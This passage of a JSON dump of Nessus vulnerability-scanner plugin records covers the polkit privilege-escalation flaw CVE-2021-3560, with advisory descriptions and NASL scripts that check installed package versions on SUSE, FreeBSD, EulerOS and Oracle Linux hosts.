audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! 
preg(pattern:\"^(0|1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0/1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libpolkit0-0.114-3.12.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libpolkit0-debuginfo-0.114-3.12.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"polkit-0.114-3.12.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"polkit-debuginfo-0.114-3.12.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"polkit-debugsource-0.114-3.12.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"polkit-devel-0.114-3.12.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"polkit-devel-debuginfo-0.114-3.12.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"typelib-1_0-Polkit-1_0-0.114-3.12.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libpolkit0-0.114-3.12.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libpolkit0-debuginfo-0.114-3.12.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"polkit-0.114-3.12.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"polkit-debuginfo-0.114-3.12.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"polkit-debugsource-0.114-3.12.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"polkit-devel-0.114-3.12.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"polkit-devel-debuginfo-0.114-3.12.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"typelib-1_0-Polkit-1_0-0.114-3.12.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) 
audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"polkit\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-02T14:51:22", "description": "Cedric Buissart reports :\n\nThe function polkit_system_bus_name_get_creds_sync is used to get the uid and pid of the process requesting the action. It does this by sending the unique bus name of the requesting process, which is typically something like ':1.96', to dbus-daemon. These unique names are assigned and managed by dbus-daemon and cannot be forged, so this is a good way to check the privileges of the requesting process.\n\nThe vulnerability happens when the requesting process disconnects from dbus-daemon just before the call to polkit_system_bus_name_get_creds_sync starts. In this scenario, the unique bus name is no longer valid, so dbus-daemon sends back an error reply. This error case is handled in polkit_system_bus_name_get_creds_sync by setting the value of the error parameter, but it still returns TRUE, rather than FALSE. This behavior means that all callers of polkit_system_bus_name_get_creds_sync need to carefully check whether an error was set. If the calling function forgets to check for errors then it will think that the uid of the requesting process is 0 (because the AsyncGetBusNameCredsData struct is zero initialized). 
In other words, it will think that the action was requested by a root process, and will therefore allow it.", "cvss3": {}, "published": "2021-06-07T00:00:00", "type": "nessus", "title": "FreeBSD : polkit -- local privilege escalation using polkit_system_bus_name_get_creds_sync (36a35d83-c560-11eb-84ab-e0d55e2a8bf9)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:polkit", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_36A35D83C56011EB84ABE0D55E2A8BF9.NASL", "href": "https://www.tenable.com/plugins/nessus/150314", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150314);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"FreeBSD : polkit -- local privilege escalation using polkit_system_bus_name_get_creds_sync (36a35d83-c560-11eb-84ab-e0d55e2a8bf9)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Cedric Buissart reports :\n\nThe function polkit_system_bus_name_get_creds_sync is used to get the\nuid and pid of the process requesting the action. It does this by\nsending the unique bus name of the requesting process, which is\ntypically something like ':1.96', to dbus-daemon. These unique names\nare assigned and managed by dbus-daemon and cannot be forged, so this\nis a good way to check the privileges of the requesting process.\n\nThe vulnerability happens when the requesting process disconnects from\ndbus-daemon just before the call to\npolkit_system_bus_name_get_creds_sync starts. In this scenario, the\nunique bus name is no longer valid, so dbus-daemon sends back an error\nreply. 
This error case is handled in\npolkit_system_bus_name_get_creds_sync by setting the value of the\nerror parameter, but it still returns TRUE, rather than FALSE. This\nbehavior means that all callers of\npolkit_system_bus_name_get_creds_sync need to carefully check whether\nan error was set. If the calling function forgets to check for errors\nthen it will think that the uid of the requesting process is 0\n(because the AsyncGetBusNameCredsData struct is zero initialized). In\nother words, it will think that the action was requested by a root\nprocess, and will therefore allow it.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/oss-sec/2021/q2/180\");\n script_set_attribute(attribute:\"see_also\", value:\"https://gitlab.freedesktop.org/polkit/polkit/-/commit/a04d13a\");\n # https://vuxml.freebsd.org/freebsd/36a35d83-c560-11eb-84ab-e0d55e2a8bf9.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3d4c0e75\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/04\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"polkit<0.119\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-15T15:59:28", "description": "According to the version of the polkit packages installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - polkit is a toolkit for defining and handling authorizations. It is used for allowing unprivileged processes to speak to privileged processes. (CVE-2021-3560)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory.
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP8 : polkit (EulerOS-SA-2021-2311)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:polkit", "p-cpe:/a:huawei:euleros:polkit-devel", "p-cpe:/a:huawei:euleros:polkit-docs", "p-cpe:/a:huawei:euleros:polkit-libs", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2021-2311.NASL", "href": "https://www.tenable.com/plugins/nessus/152407", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152407);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"EulerOS 2.0 SP8 : polkit (EulerOS-SA-2021-2311)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the polkit packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerability :\n\n - polkit is a toolkit for defining and handling\n authorizations. It isused for allowing unprivileged\n processes to speak to\n privilegedprocesses.(CVE-2021-3560)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-2311\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cb6d1587\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected polkit package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:polkit-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:polkit-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:polkit-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security 
Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(8)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP8\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP8\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"polkit-0.115-2.h13.eulerosv2r8\",\n \"polkit-devel-0.115-2.h13.eulerosv2r8\",\n \"polkit-docs-0.115-2.h13.eulerosv2r8\",\n \"polkit-libs-0.115-2.h13.eulerosv2r8\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"8\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"polkit\");\n}\n", "cvss": 
{"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-15T15:52:59", "description": "The remote Oracle Linux 8 host has packages installed that are affected by a vulnerability as referenced in the ELSA-2021-2238 advisory.\n\n - polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync() (CVE-2021-3560)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-06-04T00:00:00", "type": "nessus", "title": "Oracle Linux 8 : polkit (ELSA-2021-2238)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["cpe:/o:oracle:linux:8", "p-cpe:/a:oracle:linux:polkit", "p-cpe:/a:oracle:linux:polkit-devel", "p-cpe:/a:oracle:linux:polkit-docs", "p-cpe:/a:oracle:linux:polkit-libs"], "id": "ORACLELINUX_ELSA-2021-2238.NASL", "href": "https://www.tenable.com/plugins/nessus/150242", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2021-2238.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150242);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"Oracle Linux 8 : polkit (ELSA-2021-2238)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle Linux 8 host has packages installed that are affected by a vulnerability as referenced in the\nELSA-2021-2238 advisory.\n\n - polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync() 
(CVE-2021-3560)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://linux.oracle.com/errata/ELSA-2021-2238.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:polkit-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:polkit-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:polkit-libs\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 
2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/local_checks_enabled\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item('Host/OracleLinux')) audit(AUDIT_OS_NOT, 'Oracle Linux');\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, 'Oracle Linux');\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Oracle Linux');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Oracle Linux 8', 'Oracle Linux ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Oracle Linux', cpu);\n\npkgs = [\n {'reference':'polkit-0.115-11.0.1.el8_4.1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-0.115-11.0.1.el8_4.1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-devel-0.115-11.0.1.el8_4.1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-devel-0.115-11.0.1.el8_4.1', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-devel-0.115-11.0.1.el8_4.1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-docs-0.115-11.0.1.el8_4.1', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n 
{'reference':'polkit-libs-0.115-11.0.1.el8_4.1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-libs-0.115-11.0.1.el8_4.1', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-libs-0.115-11.0.1.el8_4.1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n rpm_prefix = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'EL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['rpm_prefix'])) rpm_prefix = package_array['rpm_prefix'];\n if (reference && release) {\n if (rpm_prefix) {\n if (rpm_exists(release:release, rpm:rpm_prefix) && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n } else {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, 
tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'polkit / polkit-devel / polkit-docs / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-02T15:09:29", "description": "According to the versions of the polkit packages installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities :\n\n - It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests, elevating the privileges of the requestor to the root user. This flaw could be used by an unprivileged local attacker to, for example, create a new local administrator. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. (CVE-2021-3560)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2021-11-17T00:00:00", "type": "nessus", "title": "EulerOS Virtualization 2.9.1 : polkit (EulerOS-SA-2021-2738)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:polkit", "p-cpe:/a:huawei:euleros:polkit-libs", "cpe:/o:huawei:euleros:uvp:2.9.1"], "id": "EULEROS_SA-2021-2738.NASL", "href": "https://www.tenable.com/plugins/nessus/155510", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(155510);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"EulerOS Virtualization 2.9.1 : polkit (EulerOS-SA-2021-2738)\");\n\n 
script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the polkit packages installed, the EulerOS Virtualization installation on the remote host\nis affected by the following vulnerabilities :\n\n - It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests,\n elevating the privileges of the requestor to the root user. This flaw could be used by an unprivileged\n local attacker to, for example, create a new local administrator. The highest threat from this\n vulnerability is to data confidentiality and integrity as well as system availability. (CVE-2021-3560)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security\nadvisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional\nissues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-2738\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?670ef6d1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected polkit packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n 